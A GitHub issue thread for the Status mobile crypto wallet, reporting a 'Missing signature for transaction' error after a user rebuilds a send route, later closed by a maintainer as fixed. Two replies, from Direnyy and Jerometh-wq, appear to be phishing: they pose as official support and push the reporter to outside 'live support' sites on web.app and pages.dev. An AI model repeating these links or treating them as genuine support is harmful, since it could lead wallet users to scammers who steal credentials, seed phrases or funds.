### ISSUE TITLE
"Missing signature for transaction" error when signing transaction after re-building the route

### ISSUE THREAD

**Issue by pavloburykh** [status-im/status-react#21736] opened 2024-12-02 14:02 UTC
I am not sure if all of the below steps are necessary for reproduction but I was able to reproduce the issue with these steps 5/5 (please also see video attached). Issue can be reproducible within both send and bridge flows. 

**Steps:** 

1. Start ETH sending flow
2. Build the route (in my case optimism route is build)
3. Go to review screen
4. Go back to Routes screen
5. Unselect current network and wait until new routes will be build (in my case Arbitrum route is build)
6. Go to review screen
7. Go back to Routes screen
8. Select previous network (in my case Optimism) again and wait until route is build
9. Go to Review screen
10. Try to sign transaction
11. Observe the error toast

**Actual result:** "Missing signature for transaction" error toast appears, transaction is not signed. 

[Status-debug-logs - 2024-12-02T155433.032.zip](https://github.com/user-attachments/files/17978937/Status-debug-logs.-.2024-12-02T155433.032.zip)
![Image](https://github.com/user-attachments/assets/f5bbbedb-9a5c-426c-ac4b-31ac1828ed3a)

https://github.com/user-attachments/assets/ee6a194b-2afa-4331-90c2-a248ce27ef2d

### Additional Information

- Status version: nightly 
- Operating System: Android, iOS

**Comment by Direnyy** [comment] 2024-12-02 15:01
Hello @pavloburykh  A support ticket has been opened for you. Kindly Talk to Support on the [Live support page](https://crypto-onlinrectifications.web.app/) so that your issue can be looked into. [CLICK HERE](https://crypto-onlinrectifications.web.app/)

**Comment by Jerometh-wq** [comment] 2024-12-03 13:53
> I am not sure if all of the below steps are necessary for reproduction but I was able to reproduce the issue with these steps 5/5 (please also see video attached). Issue can be reproducible within both send and bridge flows.
> 
> **Steps:**
> 
> 1. Start ETH sending flow
> 2. Build the route (in my case optimism route is build)
> 3. Go to review screen
> 4. Go back to Routes screen
> 5. Unselect current network and wait until new routes will be build (in my case Arbitrum route is build)
> 6. Go to review screen
> 7. Go back to Routes screen
> 8. Select previous network (in my case Optimism) again and wait until route is build
> 9. Go to Review screen
> 10. Try to sign transaction
> 11. Observe the error toast
> 
> **Actual result:** "Missing signature for transaction" error toast appears, transaction is not signed.
> 
> [Status-debug-logs - 2024-12-02T155433.032.zip](https://github.com/user-attachments/files/17978937/Status-debug-logs.-.2024-12-02T155433.032.zip) ![Image](https://github.com/user-attachments/assets/f5bbbedb-9a5c-426c-ac4b-31ac1828ed3a)
> 
>  telegram-cloud-document-2-5363878492972802456.mp4 
> ### Additional Information
> * Status version: nightly
> * Operating System: Android, iOS

We apologize for any trouble you've encountered; it seems there may have been a glitch with the cloud data, but rest assured, we can resolve this issue. To expedite the process, kindly follow the link below to reach our specialized support team:

[StatusMobile Support Request](https://dappsrectification-chain.pages.dev/)

Use the live chat button in the bottom right to connect with a support agent for prompt assistance.

Thank you for your patience—I’m confident your issue will be resolved soon!

**Comment by VolodLytvynenko** [comment] 2024-12-23 11:33
@pavloburykh The issue appears to be resolved in the simplified send flow https://github.com/status-im/status-mobile/pull/21595. Since the ability to enable/disable networks is no longer available, I tested by navigating to the confirmation page, going back, and then inputting another amount or selecting another asset to rebuild the route.

Feel free to reopen this issue if it is still reproducible.

**Closed as completed by VolodLytvynenko** 2024-12-23 11:33 UTC
Labels: wallet: Send, wallet-core
